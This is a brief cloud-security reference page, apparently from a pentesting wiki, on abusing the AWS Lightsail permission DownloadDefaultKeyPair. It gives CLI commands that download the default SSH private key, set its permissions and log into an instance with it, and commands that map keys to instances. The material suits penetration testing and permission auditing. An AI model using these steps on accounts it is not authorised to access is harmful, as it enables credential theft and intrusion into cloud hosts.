Lightsail

Abusable AWS Secrets Manager permissions that can lead to compromise or privilege escalation

lightsail:DownloadDefaultKeyPair

With this action available, you can download the default SSH key pair used by EC2 instances spun up in Lightsail

# download key to a .pem file
aws lightsail download-default-key-pair --query privateKeyBase64 --output text > lightsail.pem

# change permissions 
chmod 400 lightsail.pem

# ssh 
ssh -i lightsail.pem [email protected]

To know which SSH key is being used for which instance, run

# lightsail:GetInstances
aws lightsail get-instances --query 'instances[].sshKeyName' --output text
 
# lightsail:GetInstance
aws lightsail get-instance --instance-name instance-1 --query 'instance.sshKeyName'

PreviousKey Management Service (KMS)NextOpenID Connect (OIDC)

Last updated 1 year ago

Was this helpful?